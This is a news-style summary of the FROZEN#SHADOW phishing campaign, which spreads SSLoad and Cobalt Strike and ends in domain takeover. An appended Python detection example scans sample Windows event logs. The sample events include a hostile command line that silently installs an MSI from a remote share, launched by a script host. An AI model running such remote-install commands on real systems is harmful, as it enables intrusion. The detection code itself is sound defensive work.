Researchers Detail Multistage Attack Hijacking Systems with SSLoad, Cobalt Strike

April 24, 2024 at 09:45AM

Cybersecurity researchers have uncovered an ongoing attack campaign, FROZEN#SHADOW, utilizing phishing emails to distribute SSLoad malware, Cobalt Strike, and ConnectWise ScreenConnect. The campaign targets organizations in Asia, Europe, and the Americas, using various methods to deliver malware and gain access to critical systems. The attackers’ persistence poses significant risks to victim organizations.

According to the meeting notes of Apr 24, 2024, researchers have discovered an ongoing attack campaign that uses phishing emails to distribute malware named SSLoad. The campaign, codenamed FROZEN#SHADOW, also makes use of Cobalt Strike and the ConnectWise ScreenConnect remote desktop software for deployment.

SSLoad is designed to infiltrate systems stealthily, gather sensitive information, deploy multiple backdoors and payloads, maintain persistence, and avoid detection. The attack chains use phishing messages targeting organizations in Asia, Europe, and the Americas, delivering JavaScript files through methods that include website contact forms and macro-enabled Microsoft Word documents.

The obfuscated JavaScript file retrieves an MSI installer file by connecting to a network share and runs it to execute the SSLoad malware payload. The initial reconnaissance phase paves the way for Cobalt Strike, enabling the threat actors to remotely commandeer the host and acquire credentials.

The attackers have also been observed pivoting to other systems in the network, ultimately taking over the victim’s Windows domain by creating their own domain administrator account. This poses a significant risk and would be incredibly time-consuming and costly to remediate.
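Two of the behaviours described above leave clear traces in Windows Security logs: a script host launching msiexec.exe against a network share, and a newly created account being added to Domain Admins. The following is an added detection example (not code from the article or the researchers); the event records are constructed here, modelled on the standard 4688, 4720 and 4728 event fields, and the host, share path and account names are made up.

```python
# Constructed sample Windows Security events (not from the article), modelled on
# the FROZEN#SHADOW chain: a JS script host launching msiexec against a share,
# and a freshly created account being added to the Domain Admins group.
SAMPLE_EVENTS = [
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Users\bob\Downloads\invoice.js",
     "ParentProcessName": r"C:\Windows\explorer.exe"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i \\198.51.100.7\share\setup.msi /qn",
     "ParentProcessName": r"C:\Windows\System32\wscript.exe"},
    # Benign: an admin installing a local MSI from cmd.exe must not be flagged.
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Temp\7zip.msi /qn",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 4720, "TargetUserName": "svc_backup2", "SubjectUserName": "bob"},
    {"EventID": 4728, "MemberName": "CN=svc_backup2,CN=Users,DC=corp,DC=example",
     "TargetUserName": "Domain Admins", "SubjectUserName": "bob"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


def msiexec_from_share(events):
    """Return command lines of msiexec.exe runs whose package path is a UNC
    share (\\\\host\\...) and whose parent process is a Windows script host."""
    hits = []
    for e in events:
        if e.get("EventID") != 4688:
            continue
        if not e.get("NewProcessName", "").lower().endswith("msiexec.exe"):
            continue
        parent = e.get("ParentProcessName", "").lower().rsplit("\\", 1)[-1]
        cmd = e.get("CommandLine", "")
        if parent in SCRIPT_HOSTS and "\\\\" in cmd:
            hits.append(cmd)
    return hits


def new_account_to_domain_admins(events):
    """Return account names that were created (4720) and then added to
    Domain Admins (4728) within the same batch of events."""
    created = {e["TargetUserName"].lower()
               for e in events if e.get("EventID") == 4720}
    hits = []
    for e in events:
        if e.get("EventID") == 4728 and e.get("TargetUserName") == "Domain Admins":
            # MemberName is a DN; the first RDN carries the sAMAccountName-like CN.
            member = e["MemberName"].split(",")[0].removeprefix("CN=").lower()
            if member in created:
                hits.append(member)
    return hits
```

Run both functions over real 4688/4720/4728 exports in the same time window; the UNC check deliberately ignores local installs so that routine software deployment does not page anyone.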

In addition, the meeting notes mention the AhnLab Security Intelligence Center’s disclosure that Linux systems are being infected with an open-source remote access trojan called Pupy RAT.
